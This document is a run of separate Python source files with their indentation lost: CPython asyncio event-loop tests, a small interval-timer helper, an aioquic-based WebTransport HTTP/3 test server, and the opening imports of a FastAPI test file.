self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
with self.assertRaises(TypeError):
h1 < ()
with self.assertRaises(TypeError):
h1 > ()
with self.assertRaises(TypeError):
h1 <= ()
with self.assertRaises(TypeError):
h1 >= ()
self.assertFalse(h1 == ())
self.assertTrue(h1 != ())
self.assertTrue(h1 == ALWAYS_EQ)
self.assertFalse(h1 != ALWAYS_EQ)
self.assertTrue(h1 < LARGEST)
self.assertFalse(h1 > LARGEST)
self.assertTrue(h1 <= LARGEST)
self.assertFalse(h1 >= LARGEST)
self.assertFalse(h1 < SMALLEST)
self.assertTrue(h1 > SMALLEST)
self.assertFalse(h1 <= SMALLEST)
self.assertTrue(h1 >= SMALLEST)
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
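# Subclasses plug in either the pure-Python (events._py_*) or the
# C-accelerated (events._c_*) implementations of these hooks; setUp()
# swaps them into the events/asyncio namespaces and tearDown() restores
# the saved originals.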
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# Issue bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
interval.py
|
from threading import Event, Thread
def SetInterval(interval, func, *args):
stopped = Event()
# call it right away
func(*args)
def loop():
# then call it after the first interval has elapsed
while not stopped.wait(interval):
func(*args)
Thread(target=loop, daemon=True).start()
return stopped.set
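
# Illustrative usage sketch (not part of the original module). SetInterval
# returns the Event's set() method, so calling the returned value stops the
# periodic calls; the names `tick` and `cancel` below are hypothetical.
if __name__ == "__main__":
    import time

    def tick(label):
        print("tick", label)

    # Calls tick("demo") immediately, then roughly every 0.5 seconds.
    cancel = SetInterval(0.5, tick, "demo")
    time.sleep(2)
    cancel()  # stop the background loop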
|
webtransport_h3_server.py
|
import asyncio
import logging
import os
import ssl
import threading
import traceback
from urllib.parse import urlparse
from typing import Any, Dict, List, Optional, Tuple
# TODO(bashi): Remove import check suppressions once aioquic dependency is resolved.
from aioquic.buffer import Buffer # type: ignore
from aioquic.asyncio import QuicConnectionProtocol, serve # type: ignore
from aioquic.asyncio.client import connect # type: ignore
from aioquic.h3.connection import H3_ALPN, FrameType, H3Connection, ProtocolError, Setting # type: ignore
from aioquic.h3.events import H3Event, HeadersReceived, WebTransportStreamDataReceived, DatagramReceived, DataReceived # type: ignore
from aioquic.quic.configuration import QuicConfiguration # type: ignore
from aioquic.quic.connection import stream_is_unidirectional # type: ignore
from aioquic.quic.events import QuicEvent, ProtocolNegotiated, ConnectionTerminated, StreamReset # type: ignore
from aioquic.tls import SessionTicket # type: ignore
from tools.wptserve.wptserve import stash # type: ignore
from .capsule import H3Capsule, H3CapsuleDecoder, CapsuleType
"""
A WebTransport over HTTP/3 server for testing.
The server interprets the underlying protocols (WebTransport, HTTP/3 and QUIC)
and passes events to a particular webtransport handler. From the standpoint of
test authors, a webtransport handler is a Python script which contains some
callback functions. See handler.py for available callbacks.
"""
SERVER_NAME = 'webtransport-h3-server'
_logger: logging.Logger = logging.getLogger(__name__)
_doc_root: str = ""
class H3ConnectionWithDatagram04(H3Connection):
"""
An H3Connection subclass that works with the latest
HTTP Datagram protocol.
"""
H3_DATAGRAM_04 = 0xffd277
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._supports_h3_datagram_04 = False
def _validate_settings(self, settings: Dict[int, int]) -> None:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
if H3_DATAGRAM_04 in settings and settings[H3_DATAGRAM_04] == 1:
settings[Setting.H3_DATAGRAM] = 1
self._supports_h3_datagram_04 = True
return super()._validate_settings(settings)
def _get_local_settings(self) -> Dict[int, int]:
H3_DATAGRAM_04 = H3ConnectionWithDatagram04.H3_DATAGRAM_04
settings = super()._get_local_settings()
settings[H3_DATAGRAM_04] = 1
return settings
@property
def supports_h3_datagram_04(self) -> bool:
"""
True if the client supports the latest HTTP Datagram protocol.
"""
return self._supports_h3_datagram_04
class WebTransportH3Protocol(QuicConnectionProtocol):
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self._handler: Optional[Any] = None
self._http: Optional[H3ConnectionWithDatagram04] = None
self._session_stream_id: Optional[int] = None
self._close_info: Optional[Tuple[int, bytes]] = None
self._capsule_decoder_for_session_stream: H3CapsuleDecoder =\
H3CapsuleDecoder()
self._allow_calling_session_closed = True
self._allow_datagrams = False
def quic_event_received(self, event: QuicEvent) -> None:
if isinstance(event, ProtocolNegotiated):
self._http = H3ConnectionWithDatagram04(
self._quic, enable_webtransport=True)
if not self._http.supports_h3_datagram_04:
self._allow_datagrams = True
if self._http is not None:
for http_event in self._http.handle_event(event):
self._h3_event_received(http_event)
if isinstance(event, ConnectionTerminated):
self._call_session_closed(close_info=None, abruptly=True)
if isinstance(event, StreamReset):
if self._handler:
self._handler.stream_reset(event.stream_id, event.error_code)
def _h3_event_received(self, event: H3Event) -> None:
if isinstance(event, HeadersReceived):
# Convert from List[Tuple[bytes, bytes]] to Dict[bytes, bytes].
# Only the last header will be kept when there are duplicate
# headers.
headers = {}
for header, value in event.headers:
headers[header] = value
method = headers.get(b":method")
protocol = headers.get(b":protocol")
if method == b"CONNECT" and protocol == b"webtransport":
self._session_stream_id = event.stream_id
self._handshake_webtransport(event, headers)
else:
self._send_error_response(event.stream_id, 400)
if isinstance(event, DataReceived) and\
self._session_stream_id == event.stream_id:
if self._http and not self._http.supports_h3_datagram_04 and\
len(event.data) > 0:
raise ProtocolError('Unexpected data on the session stream')
self._receive_data_on_session_stream(
event.data, event.stream_ended)
elif self._handler is not None:
if isinstance(event, WebTransportStreamDataReceived):
self._handler.stream_data_received(
stream_id=event.stream_id,
data=event.data,
stream_ended=event.stream_ended)
elif isinstance(event, DatagramReceived):
if self._allow_datagrams:
self._handler.datagram_received(data=event.data)
def _receive_data_on_session_stream(self, data: bytes, fin: bool) -> None:
self._capsule_decoder_for_session_stream.append(data)
if fin:
self._capsule_decoder_for_session_stream.final()
for capsule in self._capsule_decoder_for_session_stream:
if capsule.type in {CapsuleType.DATAGRAM,
CapsuleType.REGISTER_DATAGRAM_CONTEXT,
CapsuleType.CLOSE_DATAGRAM_CONTEXT}:
raise ProtocolError(
"Unimplemented capsule type: {}".format(capsule.type))
if capsule.type in {CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT,
CapsuleType.CLOSE_WEBTRANSPORT_SESSION}:
# We'll handle this case below.
pass
else:
# We should ignore unknown capsules.
continue
if self._close_info is not None:
raise ProtocolError((
"Receiving a capsule with type = {} after receiving " +
"CLOSE_WEBTRANSPORT_SESSION").format(capsule.type))
if capsule.type == CapsuleType.REGISTER_DATAGRAM_NO_CONTEXT:
buffer = Buffer(data=capsule.data)
format_type = buffer.pull_uint_var()
# https://ietf-wg-webtrans.github.io/draft-ietf-webtrans-http3/draft-ietf-webtrans-http3.html#name-datagram-format-type
WEBTRANSPORT_FORMAT_TYPE = 0xff7c00
if format_type != WEBTRANSPORT_FORMAT_TYPE:
raise ProtocolError(
"Unexpected datagram format type: {}".format(
format_type))
self._allow_datagrams = True
elif capsule.type == CapsuleType.CLOSE_WEBTRANSPORT_SESSION:
buffer = Buffer(data=capsule.data)
code = buffer.pull_uint32()
# 4 bytes for the uint32.
reason = buffer.pull_bytes(len(capsule.data) - 4)
# TODO(yutakahirano): Make sure `reason` is a UTF-8 text.
self._close_info = (code, reason)
if fin:
self._call_session_closed(self._close_info, abruptly=False)
def _send_error_response(self, stream_id: int, status_code: int) -> None:
assert self._http is not None
headers = [(b"server", SERVER_NAME.encode()),
(b":status", str(status_code).encode())]
self._http.send_headers(stream_id=stream_id,
headers=headers,
end_stream=True)
def _handshake_webtransport(self, event: HeadersReceived,
request_headers: Dict[bytes, bytes]) -> None:
assert self._http is not None
path = request_headers.get(b":path")
if path is None:
# `:path` must be provided.
self._send_error_response(event.stream_id, 400)
return
# Create a handler using `:path`.
try:
self._handler = self._create_event_handler(
session_id=event.stream_id,
path=path,
request_headers=event.headers)
except IOError:
self._send_error_response(event.stream_id, 404)
return
response_headers = [
(b"server", SERVER_NAME.encode()),
(b"sec-webtransport-http3-draft", b"draft02"),
]
self._handler.connect_received(response_headers=response_headers)
status_code = None
for name, value in response_headers:
if name == b":status":
status_code = value
break
if not status_code:
response_headers.append((b":status", b"200"))
self._http.send_headers(stream_id=event.stream_id,
headers=response_headers)
if status_code is None or status_code == b"200":
self._handler.session_established()
def _create_event_handler(self, session_id: int, path: bytes,
request_headers: List[Tuple[bytes, bytes]]) -> Any:
parsed = urlparse(path.decode())
file_path = os.path.join(_doc_root, parsed.path.lstrip("/"))
callbacks = {"__file__": file_path}
with open(file_path) as f:
exec(compile(f.read(), path, "exec"), callbacks)
session = WebTransportSession(self, session_id, request_headers)
return WebTransportEventHandler(session, callbacks)
def _call_session_closed(
self, close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
allow_calling_session_closed = self._allow_calling_session_closed
self._allow_calling_session_closed = False
if self._handler and allow_calling_session_closed:
self._handler.session_closed(close_info, abruptly)
class WebTransportSession:
"""
A WebTransport session.
"""
def __init__(self, protocol: WebTransportH3Protocol, session_id: int,
request_headers: List[Tuple[bytes, bytes]]) -> None:
self.session_id = session_id
self.request_headers = request_headers
self._protocol: WebTransportH3Protocol = protocol
self._http: H3Connection = protocol._http
# Use a shared default path for all handlers so that different
# WebTransport sessions can access the same store easily.
self._stash_path = '/webtransport/handlers'
self._stash: Optional[stash.Stash] = None
self._dict_for_handlers: Dict[str, Any] = {}
@property
def stash(self) -> stash.Stash:
"""A Stash object for storing cross-session state."""
if self._stash is None:
address, authkey = stash.load_env_config()
self._stash = stash.Stash(self._stash_path, address, authkey)
return self._stash
@property
def dict_for_handlers(self) -> Dict[str, Any]:
"""A dictionary that handlers can attach arbitrary data."""
return self._dict_for_handlers
def stream_is_unidirectional(self, stream_id: int) -> bool:
"""Return True if the stream is unidirectional."""
return stream_is_unidirectional(stream_id)
def close(self, close_info: Optional[Tuple[int, bytes]]) -> None:
"""
Close the session.
:param close_info: The close information to send.
"""
self._protocol._allow_calling_session_closed = False
assert self._protocol._session_stream_id is not None
session_stream_id = self._protocol._session_stream_id
if close_info is not None:
code = close_info[0]
reason = close_info[1]
buffer = Buffer(capacity=len(reason) + 4)
buffer.push_uint32(code)
buffer.push_bytes(reason)
capsule =\
H3Capsule(CapsuleType.CLOSE_WEBTRANSPORT_SESSION, buffer.data)
self._http.send_data(session_stream_id, capsule.encode(), end_stream=False)
self._http.send_data(session_stream_id, b'', end_stream=True)
# TODO(yutakahirano): Reset all other streams.
# TODO(yutakahirano): Reject future stream open requests
# We need to wait for the stream data to arrive at the client, and then
# we need to close the connection. At this moment we're relying on the
# client's behavior.
# TODO(yutakahirano): Implement the above.
def create_unidirectional_stream(self) -> int:
"""
Create a unidirectional WebTransport stream and return the stream ID.
"""
return self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=True)
def create_bidirectional_stream(self) -> int:
"""
Create a bidirectional WebTransport stream and return the stream ID.
"""
stream_id = self._http.create_webtransport_stream(
session_id=self.session_id, is_unidirectional=False)
# TODO(bashi): Remove this workaround when aioquic supports receiving
# data on server-initiated bidirectional streams.
stream = self._http._get_or_create_stream(stream_id)
assert stream.frame_type is None
assert stream.session_id is None
stream.frame_type = FrameType.WEBTRANSPORT_STREAM
stream.session_id = self.session_id
return stream_id
def send_stream_data(self,
stream_id: int,
data: bytes,
end_stream: bool = False) -> None:
"""
Send data on the specific stream.
:param stream_id: The stream ID on which to send the data.
:param data: The data to send.
:param end_stream: If set to True, the stream will be closed.
"""
self._http._quic.send_stream_data(stream_id=stream_id,
data=data,
end_stream=end_stream)
def send_datagram(self, data: bytes) -> None:
"""
Send data using a datagram frame.
:param data: The data to send.
"""
if not self._protocol._allow_datagrams:
_logger.warning(
    "Sending a datagram while that's not allowed - discarding it")
return
flow_id = self.session_id
if self._http.supports_h3_datagram_04:
# The REGISTER_DATAGRAM_NO_CONTEXT capsule was on the session
# stream, so we must have the ID of the stream.
assert self._protocol._session_stream_id is not None
# TODO(yutakahirano): Make sure this is the correct logic.
# Chrome always uses 0 for the initial stream and the initial flow
# ID, so we cannot check the correctness against it.
flow_id = self._protocol._session_stream_id // 4
self._http.send_datagram(flow_id=flow_id, data=data)
def stop_stream(self, stream_id: int, code: int) -> None:
"""
Send a STOP_SENDING frame to the given stream.
:param code: the error code giving the reason for the error.
"""
self._http._quic.stop_stream(stream_id, code)
def reset_stream(self, stream_id: int, code: int) -> None:
"""
Send a RESET_STREAM frame to the given stream.
:param code: the error code giving the reason for the error.
"""
self._http._quic.reset_stream(stream_id, code)
class WebTransportEventHandler:
def __init__(self, session: WebTransportSession,
callbacks: Dict[str, Any]) -> None:
self._session = session
self._callbacks = callbacks
def _run_callback(self, callback_name: str,
*args: Any, **kwargs: Any) -> None:
if callback_name not in self._callbacks:
return
try:
self._callbacks[callback_name](*args, **kwargs)
except Exception as e:
_logger.warning(str(e))
traceback.print_exc()
def connect_received(self, response_headers: List[Tuple[bytes,
bytes]]) -> None:
self._run_callback("connect_received", self._session.request_headers,
response_headers)
def session_established(self) -> None:
self._run_callback("session_established", self._session)
def stream_data_received(self, stream_id: int, data: bytes,
stream_ended: bool) -> None:
self._run_callback("stream_data_received", self._session, stream_id,
data, stream_ended)
def datagram_received(self, data: bytes) -> None:
self._run_callback("datagram_received", self._session, data)
def session_closed(
self,
close_info: Optional[Tuple[int, bytes]],
abruptly: bool) -> None:
self._run_callback(
"session_closed", self._session, close_info, abruptly=abruptly)
def stream_reset(self, stream_id: int, error_code: int) -> None:
self._run_callback(
"stream_reset", self._session, stream_id, error_code)
class SessionTicketStore:
"""
Simple in-memory store for session tickets.
"""
def __init__(self) -> None:
self.tickets: Dict[bytes, SessionTicket] = {}
def add(self, ticket: SessionTicket) -> None:
self.tickets[ticket.ticket] = ticket
def pop(self, label: bytes) -> Optional[SessionTicket]:
return self.tickets.pop(label, None)
class WebTransportH3Server:
"""
A WebTransport over HTTP/3 server for testing.
:param host: Host from which to serve.
:param port: Port from which to serve.
:param doc_root: Document root for serving handlers.
:param cert_path: Path to certificate file to use.
:param key_path: Path to key file to use.
:param logger: a Logger object for this server.
"""
def __init__(self, host: str, port: int, doc_root: str, cert_path: str,
key_path: str, logger: Optional[logging.Logger]) -> None:
self.host = host
self.port = port
self.doc_root = doc_root
self.cert_path = cert_path
self.key_path = key_path
self.started = False
global _doc_root
_doc_root = self.doc_root
global _logger
if logger is not None:
_logger = logger
def start(self) -> None:
"""Start the server."""
self.server_thread = threading.Thread(
target=self._start_on_server_thread, daemon=True)
self.server_thread.start()
self.started = True
def _start_on_server_thread(self) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=False,
max_datagram_frame_size=65536,
)
_logger.info("Starting WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
configuration.load_cert_chain(self.cert_path, self.key_path)
ticket_store = SessionTicketStore()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.loop.run_until_complete(
serve(
self.host,
self.port,
configuration=configuration,
create_protocol=WebTransportH3Protocol,
session_ticket_fetcher=ticket_store.pop,
session_ticket_handler=ticket_store.add,
))
self.loop.run_forever()
def stop(self) -> None:
"""Stop the server."""
if self.started:
asyncio.run_coroutine_threadsafe(self._stop_on_server_thread(),
self.loop)
self.server_thread.join()
_logger.info("Stopped WebTransport over HTTP/3 server on %s:%s",
self.host, self.port)
self.started = False
async def _stop_on_server_thread(self) -> None:
self.loop.stop()
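# Example usage sketch (illustrative only; the paths below are placeholders):
#
#     server = WebTransportH3Server(host="localhost", port=4433,
#                                   doc_root="/path/to/handlers",
#                                   cert_path="cert.pem", key_path="key.pem",
#                                   logger=None)
#     server.start()
#     # ... run tests against the server ...
#     server.stop()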
def server_is_running(host: str, port: int, timeout: float) -> bool:
"""
Check whether the WebTransport over HTTP/3 server is running at the given
`host` and `port`.
"""
loop = asyncio.get_event_loop()
return loop.run_until_complete(_connect_server_with_timeout(host, port, timeout))
async def _connect_server_with_timeout(host: str, port: int, timeout: float) -> bool:
try:
await asyncio.wait_for(_connect_to_server(host, port), timeout=timeout)
except asyncio.TimeoutError:
_logger.warning("Failed to connect WebTransport over HTTP/3 server")
return False
return True
async def _connect_to_server(host: str, port: int) -> None:
configuration = QuicConfiguration(
alpn_protocols=H3_ALPN,
is_client=True,
verify_mode=ssl.CERT_NONE,
)
async with connect(host, port, configuration=configuration) as protocol:
await protocol.ping()
|
test_main.py
|
"""
Goal: Implement ZWL API testing
@authors:
Gaël MONDON
"""
import json
import socket
import base64
import os
import threading
import pytest
from fastapi.testclient import TestClient
from app.tests import TCPServer
from app.main import app
from app.config import defaults
